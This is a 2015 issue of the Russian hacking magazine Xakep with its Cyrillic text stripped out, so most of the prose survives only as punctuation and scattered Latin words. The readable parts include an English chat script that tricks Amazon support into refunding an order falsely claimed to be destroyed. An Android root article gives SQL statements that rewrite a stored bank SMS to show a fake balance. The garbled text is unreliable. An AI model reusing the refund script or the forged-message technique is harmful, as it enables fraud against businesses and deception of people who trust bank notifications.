Haker062015-myjurnal.ru

4

197

2015 630

Cover Story

. 10

06 (197) : 03.06.2015

. , Windows 95 . - . - . - . - , -. , - .

, ? , : - 46 800 00 . - . 20 (2) . .

, - , -. , . , - .

Stay tuned, stay ][!

, ][@IlyaRusanen

[email protected]

[email protected]

: [email protected]. : 115280, , . -, . 19, . : : 606400, ., -, . , ., . 13. : , 614111, , . , . , . 26. , (-), 77-56756 29.01.2014 . Scanweb, PL 116, Korjalankatu 27, 45101 Kouvola, . 96 500 . 630 . . . , - , . . - : [email protected]. , , 2015

PC ZONE [email protected]

[email protected]

[email protected]

ant

[email protected]

UNITS

[email protected]

UNIXOID SYN/[email protected]

Dr.

MALWARE, , PHREAKING

[email protected]

X-MOBILEexecbit.ru

-

DVD

ant

[email protected]

shop.glc.ru, [email protected]

([email protected]) : , 109147, / 50

PR-

[email protected]

[email protected]

16+

[email protected]

2015

197

004 MEGANEWS

010

014

016

020 AMAzoN

022 froNtENd -

024

028 filEMAkEr Pro 14 iOS

032 Parallels Access 2.5

034 AmigaOS

040 , Android- franco.kernel

044 SqlitE root

050

051 #8. APK

052 EASy HAck

056

061 tor:

066 rSA coNfErENcE 2015 IT-

072 ,

074 MITM-

078 WPAd WPAD

082 X-toolS C 084 ][-: iNtErNEt SEcurity McAfee Total Protection, Microsoft Security Essentials

090 WIM, CSRSS, EMET, CCMP, EFS, SEHOP, ASLR, KPP, UAC, DEP -1

094 Carbanak Equation 11

096 ANdroid

102 API

106 CUSTIS DZ Systems

110

116 : Debian 8

122 IDS/IPS Suricata

126 MS SQL Server

130 Bro

136 Razer

140 fAq

144 WWW -

Microsoft - Windows 10 , - . - .

- ,

Project Spartan. - Edge, - -, . , Spartan , , Microsoft -. , , - E. Internet Explorer, . Microsoft , IE - . IE Windows 10 , - . - . , . , Microsoft , Edge Google Chrome Mozilla Firefox. ,

, , -. Microsoft Bounty Programs. - 500 15 .

- -. , , Windows 10 Android iOS, . Microsoft , -, , - , Windows. SDK. Android- Java C++, iOS- - Objective-C.

-. Microsoft Open Technologies, -, Microsoft Open Source, Linux Windows. Microsoft , - , . , - .

Meganews

Mifrill [email protected]

Internet Explorer

Edge .

windows 10 Microsoft

Microsoft -

Windows 10

.

,

-

Windows 10

- . -

200

Windows 8.

oogle , YouTube. , , . YouTube . . -

? , . - , . Google -: . , Google . , , .

, Google YouTube API v2, 2008 . , YouTube API v3. -, API- v2, . Google , - API v2 , 2012 , Google TV, iOS, Blu-ray- Sony Panasonic. -, - XML. , .

YouTubeGooGle

g

Cyclance - , - - Windows,

. Microsoft, -. Adobe Reader, Apple QuickTime, Apple Software Update, Internet Explorer, Windows Media Player, Microsoft Excel, Symantec Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus .

, , - Redirect to SMB, - 1997 ! Server Message Block. , SMB- , / . Windows API (URLDownloadToFile, URLDownloadToCacheFile, URLOpenStream, URLOpenBlockingStream) HTTP/HTTPS SMB, URL file://1.1.1.1. Microsoft , - TCP 139 TCP 445.

-- WindoWs , 18

C

, . , , , , . .

API v2

, , ,

Google .

06 /197/ 2015 5

, . - , -

. - (, ) -. , .

Computer-Human Interaction Yahoo Labs Bodyprint. Bodyprint , - . , , , -. , Yahoo , , . , . - , - , , .

Yahoo

Bodyprint

.

-

,

: -

,

99,52%.

- . WikiLeaks 173 132 2000 30 287 Sony Pictures Entertainment. . Sony. - , .

RSA Conference - . POS-, - 1990 , . . : 166816 ( Z66816, ). , - , , , , - Verifone.

166816

173 132 -, - , . ,

, - . - , - - , .

LIVE Plus

06 /197/ 2015MEGANEWS6

GitHub . , -

(Great Canon), - .

- Citizen Lab, , - GitHub, Greatfire.org, DDoS GitHub. Citizen Lab, , man-on-the-side - . . , GitHub Baidu.

GitHub Google, Safe Browsing. , -, , . 1 15 2015 , Baidu 3 2015 , 7 . -

- ,

TLS, , Google - GitHub.

. -, 3 6 , IP- 114.113.156.119:56789 -. 14 , d3rkfw22xppori.cloudfront.net. HTTP, HTTPS. 18 *.cloudfront.net , . 25 Cloudfront . GitHub. github.com/greatfire/wiki/wiki/nyt/, github.com/greatfire/ github.com/greatfire/wiki/wiki/dw/.

JS. 995 1325 . : cbjs.baidu.com (123.125.65.120), eclick.baidu.com (123.125.115.164), hm.baidu.com (61.135.185.140), pos.baidu.com (115.239.210.141), cpro.baidu.com (115.239.211.17), bdimg.share.baidu.com (211.90.25.48), pan.baidu.com (180.149.132.99), wapbaike.baidu.com (123.125.114.15).

, Google - , : TLS, .

GiThub

Loggy GitHub, -, -. , ( 70% ) - 2012 - 2014 .

Citizen

Lab ,

-

-

,

.

06 /197/ 2015 7

, , , - , , . , , ,

, . 2013 ,

Minecraft DoS-. - , . - Mojang . , . , 1.6.2. 1.8.3, - - . (blog.ammaraskar.com/minecraft-vulnerability-advisory).

0x08: Block Placement Packet 0x10: Creative Inventory Action. , , - , 30 . - Java-, ArrayLists, . , , CPU - .

, -, Mojang .

,

? Trend Micro Ponemon Institute ,

, -. 1903 18 .

, Google - Google Play, , , -

. - Google Play adware, Android -. : ( - , - ), - , . Adware.MobiDash.2.origin - Adware.MobiDash.1.origin. , -, , .

, , , , - Google Play, . Android.Toorch.1.origin. -. , , - . , root- , - .

android-

GooGle Play - , 100%

MinecrafT

, -, ?

63% .................61% .......53% ..........49% ....................23% - ,

-

- -

- , -, -

- -

- ?

75,8 59,8 55,736,0 29,2 23,5 20,6 16,112,9 12,2

(GPS)

$

( )

06 /197/ 2015MEGANEWS8

, - Nero,

. WebMoney -

-... .

WebRTC, Chrome, Firefox Opera. , -

: ?

- . Google eBay, AliExpress

, - .

, ( )

.

, - , Stack Overflow.

,

, : ru.stackoverflow.com. , ,

, , . - - 30 .

,

. - - MP3- -. ,

, - .

, MP3 - :).

, Joomla WordPress, - ( WordPress, W3Tech, 23,9% ). . CMS

. , -, - CMS .

WordPress : . , , - . WordPress 4.2 , , Klikki Oy. , , - (64 ), , - HTML-. , , . - :

WordPress Foundation , , - CMS.

, , , . WP-Super-Cache, HTML - . (XSS). , -. , Sucuri : 8 10 . , .

. , , , WordPress, - RevSlider, Gravity Forms, FancyBox, WP Symposium MailPoet. WordPress Foundation - .

wordPress cMs

, WordPress 4.2,

. ,

.

06 /197/ 2015 9

-,:-.,-.--.

,.

[email protected]

06 /197/ 2015Cover Story10

-. , 1906 - . . .,-.

, --,-..-. ,-.

. --,- . -.-.

PwnieExpress.-,,,. X: -,-.- . DEFCON.

,,- ( !), . -.-.

- -.!. USB-.,,,.

.,,.,?

, -.,,, -.. . , , , ., . , .

, -,-.,.-,-.

-,.,,.

. ,.,, . , -,- . ,-.

, , ..!-,,,- , , ,. . - .

,-.,,.?. -email,- , -.

-- . , ,- . ,,-.

INFO

- .

, .

.

-

.

06 /197/ 2015 11

.,- Social-EngineerInc., . , -.-, , - . , ,,-.,,.

! -. , ,-, . .LinkedIn., ,.-.Twitter.Foursquare- -..

GlobalDigitalForensics-., Facebook ,.- , :!!-,,-,.

Keep it simple!,-, .Solutionary,,,-.

-,.,.--:-. XX.

, . ,,-,,-.

-. . -, -.,.-,.,-. ,.

-, --GeneralDynamicsFidelisCybersecuritySolutions.-.

- (SSLVPN)- . email :-- . , .,-..

.60%-.-,-75%.().

- , ,ComputerSciences Corporation. , -,-. , ,.

-.,DHS.-,.

60%-.- 90% .

WWW

IDG

:www.csoonline.com

:

is.gd/OtQtwX

--.,-,--

06 /197/ 2015Cover Story12

,,-.

- . ,-ILOVEYOU2000.- - .BlueCoat,-BainCapital.

BlueCoat,., .,-.

,.- Girlsof the IsraelDefenceForces. ,.

-.ReverseSE. , - , ., . -, , .

. -.,-,.-,-.,-. -, .,-.

?, - . , - . The SecurityAwareness 25 . . --.-,..-

:-,, , .

!-.-,,.- 1200 ,-.

, - -,-(!)., . - , . -.

,-- - , ,.:,- . , , -.-,. -, .,XXI-.

, .-- . ,.,-.,-.,.,.(!)-.

: ,- , . .

,,-.,-,,.

, - , . , - , ,.,,,- , ..

WARNING

-

. , -

, -

.

1200-

,

06 /197/ 2015 13

-.

,-.,,.-

,..

[email protected]

14 Cover Story 06/197/2015

, -,?,-,.

,. , -LinkedIn.-:,()-.:(),-,-.,,,-.,(,)-..

, .,,-.

,- . ,,-(-,)..

, , , , , .Facebook,Google+,Tumblr(,,,),GoogleImages(),Twitter(),Pinterest,FlickrInstagram(-,),Ask.fm(),Meetup(- ) . , .

, Foursquare, iCloud (, iCloud ). - .: spokeo.com ;city-data.com ;whitepages.com,,,.

.--.Maltego,.-.

Maltego CaseFile. .CaseFile

, CSV,XLSXLSX.

Ghostery.-,Maltego . Ghostery ,.

- , . ,, , .,,,,- . , , , . , , -, . ,.

. Whois (IP, -). BuiltWith.-,-,SSL,,-JavaScript-.,,.

,--,,- -.

. --Google , (-).

, - Rivalfox, - : Facebook,Google+, Twitter, Instagram - ( -).FalconSocial, .

-, -,!

Maltego

Ghostery

WARNING

-

. , -

, -

.

06 /197/ 2015 15

- SQL-. , Advanced Persistent Threat (APT) - , .

- , -

.

[email protected]

Positive Technologies

[email protected]

16 Cover Story 06 /197/ 2015

, - , - . -

: , , .

/READY , , - . ?

. .

? , , - .

-? , .

? -? : , . - - !

? ? ? , - - , ?

? , , -, . - , .

: , , , .

. , - , .

, , , , , , , . .

. , . standalone Metasploit. - , - FOCA MALTEGO. , SMTP- - VRFY/EXPN .

, -. . - ; . - , - !

, , - , - . . -

, ( - ) , . - - , .

/STEADY . .

. -: , - .

, , , -. - : -

; , -

. , ;

, -. , Bad USB, Teensy .

: , -

, : , ;

SMS MMS, - , .

.

-

- . , . -, . , , SSRF

callback Reverse DNS. . : 100, 90, . , , , , .

, (- ).

. , !

SMTP relay ( ) - .

, XSS/RCE . . -, .

. - . , , , , , .

WARNING

-

. , -

, -

.

06 /197/ 2015 17

: -, , , - . APT .

, , - : - - .

, - , - , -. . - : - , , .

, - . . , -: , , , , .

, , - . . , , - , - .

, -. -: , : l i, o 0 . - , , . , - , - . , - , .

: SMTP- relay. SMTP. - 25/465 sendmail . , , - - : Reflected File Download, Open Redirect, XSS RCE SQLi , HTML . - . - , - .

: , - . . -! ( HTTP, DNS, ), , ( ), , -, . -

. , .

/GO : , - . , ( , ). , - .

: , . - , .

, , , - , . - , ( - ). , - , . - , -. , , , - .

ptsecurity.ru.

Positive technologies

WWW

-

(blog.didierstevens.com).

. - - Threatpost. com.

- ,

06 /197/ 2015Cover Story18

, -. , .

/ FINISH HIM! - - VPN, RDP, . , .

Positive Technologies - , - . 2014 , , , -, - , 15%. . , ( ).

15% ? . .

? , - , . - .

: , , - . , - .

- ( - , - ). , - . - : , , , . , - . , - : SMS .

, - . -, .

84ckf1r3 [email protected]

- . - , - , . - , , .

IQ , , - . , - , , , . DDoS- .

- . - , - .

- , , : - , - . , , , .

, - , - . , , - . -, .

-. - , . - .

- -

- . - -, , , (, , - , ), ( - , , -, , - ). - . - , - .

- : ( - ) , - - , , . - .

-

-

-

. -

06 /197/ 2015 19

- Amazon , - , ,

.

AmAzon

Kaimikaimi.ru

- , - , BlackBank Market. -

, , , , Amazon.

. , , Ships from and sold by Amazon.com Fulfilled by Amazon ( - ), 1500 ( - ), - . : , email Amazon, , , , , .

, -, Deep Web, - , , , .

, ! , --. - - , - . , -, , .

? - , - Amazon. , , . Amazon, VCC (virtual credit card) --, . - Amazon. , . . - .

20 Cover Story 06 /197/ 2015

You are now connected to Amazon from Amazon.com.Me: Hello, several days ago Ive ordered a gift for my friend for his birthday. Ive received it, but order package seems to be damaged.Amazon: Hello Bob, thanks for contacting Amazon, my name is Alice.I am so sorry to hear about this.Please allow me a moment to check on this for you, Ill be happy to assist you.May I have the order number you are referring to please?Me: Order number is ###-######-#######Amazon: Ill be happy to help you with this, but first we would need to go through a quick security verification in order to access your account. May I have the email address, the name and the full billing address on your account please?Me: E-mail: #####@hotmail.com; Name: Bob Smith; Address: Sample Street 1150 15, NW Washington DC 20071.Amazon: Would you mind if I take a moment to check on this for you? It will take a few minutes.

, , , - ( , Amazon).

Amazon: Our best option in this case would be to issue a refund associated with a return. Or a replacement associated with a return. Also I can upgrade to the fastest shipping available.

, , - , . .

Me: Sorry, but I cant return the package. It turned out that it was damaged and inside of the box everything is covered with something like black tar, so I throw it away, because it doesnt seem to be normal and can be dangerous.Amazon: You can put the whole package in any big-ger box and send it back for a full refund.

- .

Me: I understand, but Im saying that Ive thrown away the package, because this tar can be danger-ous for health. And as Ive mentioned before, it was a birthday present for my best friend. I cant wait for replacement and such stuff, Id rather try now to buy something at local store to catch the beginning of birthday celebration.Amazon: OK. I will issue the item refund for you. One moment please.Me: Thank you understanding.Amazon: Sorry for waiting, Ive requested the refund, you'll see the refund back to your origi-nal payment method within 23 business days. Ill also make sure to send you a confirmation regarding todays solution.Me: Thank you!Amazon: You are very welcome! If there is anything else I could help you with today?

! . , - , , .

, , - , .

, - , . , Amazon - - .

, : ( - ) , , - ( -, ).

? , , , , , , . Amazon , - . , , , , , , .

,

-

-

Amazon

WARNING

-

. , -

, -

.

06 /197/ 2015 Amazon 21

Frontend -

ipestov.com

ExpandJS

www.expandjs.com , -, . - . , -, HTML-, .

ExpandJS. -, 80 - 350 JavaScript- . Material Design, .

:

Form factor: {{type}}Mobile device: {{mobile ? 'yes' : 'no'}}

:

... ... ... ...

Ramjet

https://github.com/rich-harris/ramjet , - - . SVG, DOM- - . Ramjet - easing- -:

a

b

// to repeat, run this from the console! ramjet.transform( a, b );

, - , . GitHub , - -. , .

Electron

electron.atom.io NativeScript React Native - -. Electron, - HTML, CSS JavaScript. Electron, Atom Shell, GitHub. , , , - . io.js Chromium. , - Atom, - , Docker, Slack, Facebook, Microsoft. , : Electron Windows-.

jQuery.my

https://github.com/ermouth/jQuery.myjQuery.my - . - , , . jQuery.my Query UI, Select2, CodeMirror, Ace, Redactor, CLeditor, jQuery Mobile .

var data = { name: "Luke Skywalker", age: 46};$("#form").my({ui:{ "#name": "name", "#age": "age"}}, data);

06 /197/ 201522 PC ZONE

. . ,

-.

bonumopus@

shuttersto

ck.com

[email protected]

WARNING

- - . ,

.

WWW

SysInternals

73 :is.gd/DuTDyN

NirSoft 56 :is.gd/GmkDwW

AVZ:z-oleg.com

06 /197/ 201524 PC ZONE

Autoruns Winternals Software ( - Sysinternals.com), Microsoft. - - , - Microsoft. - 13.3 2015 . v.13.0 , , -, .

Autoruns . - -, ( ) . - Windows, , - , .

, - Microsoft, , . - , .

- . Autoruns , .

. - , . (is.gd/0TQ6Ye), :

autorunsc -a blt -vrs -vt > C:\Autor.log

autorunsc , . -a , . : b boot execute ( , -), l logon, - t . blt (*), .

-vrs -vt VirusTotal.

, Microsoft . , - . , - VirusTotal - .

Autorunsc ( ), -. -. UCS-2 Little Endian. - :

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunAdobe ARM"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"Adobe Reader and Acrobat ManagerAdobe Systems Incorporated1.801.10.4720c:\program files (x86)\common files\adobe\arm\1.0\adobearm.exe20.11.2014 21:03VT detection: 1/56VT permalink: ( VirusTotal).

Autoruns : is.gd/0TQ6Ye.

Autoruns

, VT

06 /197/ 2015 25

- , . - - .

Process exPlorer Autoruns Process Explorer (PE). PE, Autoruns, - .

PE : - . , - ( ) VirusTotal. , . , -, .

, . - , , , - /, . - . , . , () . .

PE . - . , - VirusTotal, , (suspend) -. - ( ), -. , Process Explorer (resume). -, , -. BIOS/UEFI, .

- , -. - , - . Process Explorer . , , . PE .

Process Explorer, - ( ) Debugging Tools for Windows. (is.gd/flp0WS) Windows Driver Kit (is.gd/TURLrM). Process Explorer Microsoft (is.gd/VR6CwF).

, Torrent Process Explorer

- Safari

unlocker , Windows, . . , -, (Cedrick Collomb). Unlocker : - , . 2013 , - . , - , index.dat, Windows .

Unloker , - . .

06 /197/ 201526 PC ZONE

. , .

. AVZ ( ) .

. Unlocker, AVZ Boot Cleaner. , Windows . , , .

AVZ -. NTFS , - Microsoft . , - HackTool. - , - . AVZ - .

AVZ -, .

- , . .

AVZ AVZ, , . , - -. , , - , , SPI Winsock , .

- . AVZ , , , - . AVZ - .

AVZ , - , AVZPM . - , , - .

AVZGuard , AVZ. ,

AVZ

Unlocker ,

, -.

, . Unlocker , - . - Win32 API, : -, .

, . Unlocker .

1.9.0 64- Windows. - . Unlocker Assistant. - Unlocker , - . -h

AVZ

06 /197/ 2015 27

FileMaker Pro 14 iOS

[email protected]

Frannya

nne@sh

uttersto

ck.com

06 /197/ 201528 PC ZONE

Microsoft Access . . ,

, , . , , - . -, Access FileMaker Pro 14.

Access, FileMaker Pro - , ( , . , , FileMaker Server). FileMaker Pro , .

, , - (, , Windows 8 OS X 10.10) . , - .

FileMaker , Access, -. . - MS-DOS, . Apple , FileMaker . , Microsoft - . Access - .

FileMaker . - , - Mac OS. FileMaker Pro - , OS X ( Windows, , ). , - , : , - . FileMaker Pro , .

Access -, , - , FileMaker Pro -

. - , . FileMaker Pro -, .

- iOS. FileMaker Pro , iPhone iPad. , , , - . , , FileMaker Pro - .

FileMaker Pro 14. - (Layout) , , -. FileMaker Pro Access. , . - , -. ,

Filemaker Pro 14

.

Windows

FileMaker Pro 14

data-driven . Microsoft Access, - . FileMaker , -. iOS.

06 /197/ 2015 FileMaker Pro 14 29

, , PDF.

, (Browse), - . - FileMaker Pro , , .

. (Find) -, , , - .

, , . - Manage, . Manage Database, - : Tables, Fields Relationships. , , , . , , , .

CRM - . , . , - : , .

, : Calculation Summary. , , -, . Options - , , , .

Relationships , (foreign keys), , - FileMaker Pro, (match fields). - : - , - , . - , .

Manage Database, , FileMaker Pro -: . , : . -, . .

- . , , .

. FileMaker Pro - , . ( , ) . iPad, Enlightened Touch. - , .

. , , - , , . , , , - , . - .

- . ( ) ( , ). - : , - , - .

, . : - . .

-

.

-

,

.

,

-

. -

-

.

FileMaker Pro 14

06 /197/ 201530 PC ZONE

, -.

. , . - , . . - , - . - , . .

. ( , - , ) - iPad. (File / Share with FileMaker Pro Clients), -.

, - iOS, - , , , , .

- - c . , - .

, - , - . . - : , -.

-, . FileMaker Pro , , , . - , , , - , . ?

-. , ( - ). : , -. , FileMaker Pro , : - = ::. !

. : - FileMaker Pro. - , - , . .

, -

-

iPad

06 /197/ 2015 FileMaker Pro 14 31

- -, Parallels Access . - , - . - .

Parallels access 2.5

, Parallels Access, , -. OS X VNC, - ,

- . , ?

Parallels -, . - , ( Windows). - - .

, Parallels Access ( iOS, Android). ,

, . . , , - , , - -, ( , - , , ).

, -. : , , -, Launchpad. , , . : . Access , .

[email protected]

.

,

06 /197/ 201532 PC ZONE

? : -, , Photoshop, - . - . - . Photoshop , .

Parallels Access - . 443- (HTTPS), . - Parallels , , IP- - . Parallels Access access.parallels.com, - .

, Parallels Access . - 650 . , , - , .

, Parallels Access . - , - , . , .

, - Parallels Access . - - , . Parallels Access , - . , . , , , , - . , , , - .

- , . : , Launchpad, , . Parallels Access.

. , Parallels Access - , , . - iOS Android: .

, - . - , . -, , Windows Finder - . : . , . Parallels Access - .

, - Parallels Access -. . - ! , Parallels Access . . , World of Warcraft, : , - , -. , . , -, VNC.

, Parallels Access . , -

, !

,

Photoshop -

!

,

-

-

, -

06 /197/ 2015 33

AmigA CorporAtion. - . -: , . , -

- .

Amiga Corporation . (Jay Miner), Atari. - 8- , Atari 2600 Atari 400/800. Atari , - , , - , .

- . - , Motorola 68000, Atari --, , , .

(David Shannon Morse) - Tonka Toys, . - Lorraine ( ) - .

- 32- Motorola 68000. , , - - - . Motorola 68k Apollo Apple Macintosh . , - - . Lorraine , Apple Macintosh, ( ).

Lorraine - . , --

1985 Commodore Amiga AmigaOS. - -, -. , .

AmigAOS

06 /197/ 201534

, - - , . (DMA), - , -. ? , - ( 640 256 4096 ) ( - ) Dual Playfield ( - -), c . - 8- - 14- .

Lorraine 1983 - . - CES - . - Boing Ball , Amiga, AmigaOS.

Lorraine - , OCS Original Chip Set. : Agnus DMA, - ( 2D-), Denise , - , Paula . - , - Lorraine. , , Atari, - Lorraine 16- Atari ST, Commodore, -. Commodore - Commodore Amiga 1000 - Motorola 68000 OCS.

AmigAoS. OCS - Amiga 1000 , , , , Commodore - . NTSC PAL - .

. - AmigaOS, Amiga 1000,

Agnus, Denise Paula. , , . software engineers (R. J. Mical), (Dale Luck) (Carl Sassenrath).

OCS. CES Boing Ball , -

-

Lorraine

Blitter Copper

Agnus

Dual Playfield

-

-

,

,

Amiga. -

AmigaOS

Amiga

OCS

Agnus, Denise

Paula -

Commodore

Semiconductor Group

06 /197/ 2015 35

. - Motorola 68000 - Blitter Copper Agnus. - .

Amiga 1000. - . UNIX- - . , - . ( , - !), , - .

: - , . (runtime libraries) , . - - Exec , - AmigaOS, -, , - , - ... . SassenRanch : Exec AmigaOS .

runtime- Amiga 1000 -, Exec. , - Commodore. graphics.library intuition.library , - .

. Agnus Denise graphics. - OCS, , , graphics.library . - intuition.library - , , . - intuition Amiga Graphicraft, Musicraft Textcraft.

1985 Commodore Amiga 1000 ( . - : ) Commodore

, . , - AmigaOS ( ) - , Commodore MetaComCo, - TRIPOS - (DOS), - , Motorola 68000. AmigaOS - . - TRIPOS . TRIPOS dos.library. AmigaOS : TRIPOS BCPL (Basic Combined Programming Language) , (, - Hello, World BCPL).

AmigaOS dos.library - . Exec dos.library runtime-, - . , dos.library, . dos.library, ,

AmigaOS

-

,

-

AmigaOS

Exec

1985-

NT-

Windows

AmigaDOS -

INFO

AmigaOSRAMdrive.-

-.(PerryKivolowitz),Amiga,-.RRD(RecoverableRAMDisk)RAMdrive,

reboot.

06 /197/ 201536

AmigaDOS , - AmigaOS.

, AmigaOS . Motorolla 68000, , - MMU (Memory Management Unit), - . , . -, . AmigaOS , . Guru meditation , AmigaOS .

AmigaDOS runtime- , Exec , - , , , . - ( -) devices.

, AmigaDOS trackdisk.device, floppy- (, , scsi.device). intuition input.device, , -, keyboard.device, serial.device gameport.device. AmigaDOS intuition console.device.

KiCKStArt WorKbenCh. , 2, - AmigaOS . -- Kickstart. PC - BIOS IPL. - Autoconfig. - . , - , . PCI plug and play, , - Autoconfig.

- - Exec. , AmigaOS, - (0000$

AmigaOS Exec -

,

WWW

AmigaOSHyperion

Entertament:www.amigaos.net

-

Amiga:www.amigahistory.co.uk

AmigaOS-

:aminet.net

Amiga:ada.untergrund.net

LorraineCES

1984:https://www.youtube.com/watch?v=nLcpn1_

IY1A

SarewareMUI:

www.sasg.com/mui/

opensource-AROS:

aros.sourceforge.net

MorphOS:

morphos.de

, -

-

Kickstart ROM-

-

Amiga Workbench

,

Boing Ball

craft

Graphicraft

Textcraft

Workbench

06 /197/ 2015 37

0004), SysBase, Exec. , Exec - devices, - runtime , . , , , - . - Exec , , - . , - .

Amiga, 3,5- , Kickstart - AmigaOS . - ROM, Kickstart. AmigaOS - Kickstart.

- , Amiga softkickers, - Kickstart. , , - ( ), - .

AmigaOS , intuition, AmigaDOS - . - - !

- Insert Amiga Workbench. , Workbench, , -... , , , , , (), - ( ) crafts (). , , . Workbench Finder Apple Macintosh GEM, - CP/M Atari ST.

, . , 1.0 Workbench . , , . Workbench ,

AmigaOS , Amiga Workbench.

Workbench - . Workbench , GUI - .

- Amiga AmigaOS. (Stefan Stuntz) - MUI (Magic User Interface), AmigaOS -.

AmigAoS. , - , - AmigaOS, IBM PC? - Commodore . - , Amiga, -, - . , .

Commodore PC. , OCS , . Motorola - Intel, ECS (Enhanced Chip Set) Super Angus Super Denise .

- - . OCS AGA (Advanced Graphic Architecture) 262 , . Amiga 1200 Amiga 4000 AGA NTSC PAL - - . , - -5 - .

AmigaOS - . - MS-DOS , Windows . -

-

MUI

-

Workbench

INFO

2001-Amiga.:,,Amiga3000.3D-VistaPro,-

-

.

INFO

Workbench1.2-.,

-AltShift-F1-SystemSoftware:Carl,Neil&Kodiak.

F2

:GraphicsSoftware:Dale,

Bart,Jim&=RJ=.

06 /197/ 201538

, NT AmigaOS: Executive - DLL-.

Commodore, AmigaOS - , - . , : Amiga , .

Amiga AmigaOS, - . 2005 AmigaOS, PowerPC. Hyperion Entertament, AmigaOne, - , PowerPC - Pegasos II.

AmigaOS 4.x - Amiga, AROS (Amiga Research Operation System) . AROS

AmigaOS, 3.1 API. AROS - , AmigaOS, Commodore Amiga. , . Macintosh Operation System, Motorola PowerPC, Intel UNIX BSD. AROS AmigaOS - Intel x86-64, Motorola 68k PowerPC, - Linux, FreeBSD Windows host-. AROS - Zune MUI - .

AmigaOS MorphOS. Phase5 Digital Products, (turbo-), Amiga. (Ralph Schmidt) (Frank Mariak), PowerPC. - -. , AmigaOS - , AmigaOS, - . - . MorphOS Quark, - (boxes).

, ( ) MorphOS, A-Box , - ( ) AmigaOS. Q-Box, , - , OS X FreeBSD, PowerPC.

, , , - AROS MorphOS, - , Amiga . - . , . , , , - . , , - . - AmigaOS.

Open source

AROS -

AmigaOS,

MorphOS

AmigaOS -

.

Quark

MorphOS -

MUI -

. AROS,

Zune

06 /197/ 2015 39

(Francisco Franco) - Android-, - franco.kernel Nexus FKUpdater. -, - - , - - .

, Android- frAnco.kernel

androidstreet.net

BRADA

[email protected]

06 /197/ 2015X-Mobile40

, , Nexus, . , - , , , franco.kernel , , . , - franco.kernel - - Nexus .

, , , - , - , . .

. -5 - , - ?1. , .2. - -

. .

3. .4.

.5. .

, . . , , - Android.

--: - CloudCar, Android Auto, 2014 - 2014 .

, Linux - . - Android LG P500. - , /sys /proc, - .

Android 2.2, - . Dalvik RAM-, - . Dalvik , . , - Dalvik /cache .

, , -

-

, : - Linux- Android- , -, -, . - ( ) , , franco.kernel.

CPU

FKUpdater: CPU GPU

06 /197/ 2015 41

, -. , Linux- , - - , . -.

Huawei X5. Qualcomm high end , 800 2000 . -, Nexus S, Galaxy Nexus. - FKUpdater. -, .

? , - - (governor) - ( ). - - . - (, ), .

, , - Nexus 6. 1,5 , -. , . , - . .

? -, Interactive Conservative 10 (0,01 ), - . , - 1,7 , , 40 (0,04 ). , 40 - , - ( 60 16 ).

, MPDecision. - .

, Conservative?

Interactive Conservative. , , Google, - Qualcomm ( - Snapdragon 805). -, , Conservative, , Ondemand, - .

InteractiveX, - leanKernel, ?InteractiveX Interactive - ( ). , , - Interactive Ondemand . -, , .

. - ? . - . - , X Y , .

, - , ? ?, , doubleTapToWake (- . . .) / , - - . , doubleTapToWake - , One Plus One Nexus 6, (, ).

, , Linux. - , - , .

CyanogenMod? CM, - , , , - . , Nexus 7 2012 , Nexus 5 6, , CM. Nexus 4 Nexus 7 2013 , - CyanogenMod.

Android ? -? userspace-, , Android ( ).

--,,-InteractiveOndemand

,---MPDecision

06 /197/ 2015X-Mobile42

, , ioctl. -, - . , - , ioctl, . ( ).

API. , . Android , (, -, ) , - .

, CyanogenMod, - Nexus 4. Android 4.3 CyanogenMod HardwareComposer, , .

- , - . C ? - , . , , - . GSM- , .

... - . HTC One M8. Wi-Fi . -: OEM-

Google , , - . -.

, Nexus 4, - - . Qualcomm , .

- , -, , ? - , - Nexus 6 . , .

Nexus OnePlus One? ? ( , Google, Motorola Cyngn - ). , , .

? - , -.

? - ?, , Imoseyon ( leanKernel, - franco.kernel. . .) - . CodeAurora ( Qualcomm. . .) .

FKUpdater Google Play?, FKUpdater. - , 2011 . - . FKUpdater , , .

. . .

FKUpdater, : Peek , Active Display Motorola.

: , , ;

Per-App Modes - . , , GPU , , . root - ;

Servicely . Servicely, -, (, ). Servicely . -, ;

Nexus Display Control , RGB . Galaxy Nexus, Nexus 4 Nexus 5. ( franco.kernel);

Simple Reboot - (recovery, bootloader, etc.);

Simple CPU Monitor Extension DashClock, .

GooGle Play

,-,-

06 /197/ 2015 43

Andy Frith

@sh

uttersto

ck.com

.

SQLite,-Android.-db.,,.

root

06 /197/ 201544 X-Mobile

,Android-. /data/data/__/databases.- () PlayMarket.

/data/data,-,RootExplorer., ,,SQLiteDebugger(goo.gl/W4Euvp),DBBrowser for SQLite (sqlitebrowser.org). BusyBoxsqlite3.Nexus55.1. , -,- SQLite Debugger, App.-?.

accounts.db /data/system/ /data/system/users/0 - , . accounts.db account,-.,().

authtokens ,Google,GMS-.extras,GoogleUserId/.,Talk,YouTube,URLshortener,Wallet.

,,,-.. Nexus 5 - Nexus 7 ( 5.1 flash-all.bat -w, root). -,,accounts.db(WhatsApp,APK1mobile.com).,-/data/system/users/0.

,-Google ., ,,Google+,,GoogleDrive,-,.PlayMarket, : rpc:s-7:aec-7.,-.

-: Viber,

; Facebook,-

; WhatsApp; ICQ,

; LinkedIn

; Pebble

; Dropbox; ..

,,-.

:-,accounts.db.

mmssms.db -. /data/data/com.android.providers.telephony/databases/. --.- 900 . mmssms.db,:ECMC684402.05.1512:49 450 210009 KARI : 3281.16. ,.-SQLiteDebugger.-sms.:

> SELECT _id, thread_id, address, date, body FROM sms WHERE address = 900

- ,.-.-(,).

, SELECT -,,,,,UNIX time

accounts.db

accounts.db

BRADA

[email protected]

06 /197/ 2015 SQLite 45

(. mmssms.db).-. .Update value. . - .ECMC684405.05.1510:181000000ATM367700:1003731.16.-:

> UPDATE sms SET body = 'ECMC6844 05.05.15 10:18 1000000 ATM 367700 : 1003731.16' WHERE _id = 196

,- . (05.05.1510:18)date.UNIXtime-,-unixtimestamp(goo.gl/R1wv2a). 1430810300.date.

> UPDATE sms SET date = 1430810300000 WHERE _id = 196

, - . - Commit . , . mmssms.db , . -,,.

.-:threads,-()/, sms, ..1. .

sms - thread_id, -. mmssms.db, 7.,- . : thread_id/; address-; person ;date; read1 ,0; type1,2(04);body . , , :

-

mmssms.db

mmssms.db

06 /197/ 2015X-Mobile46

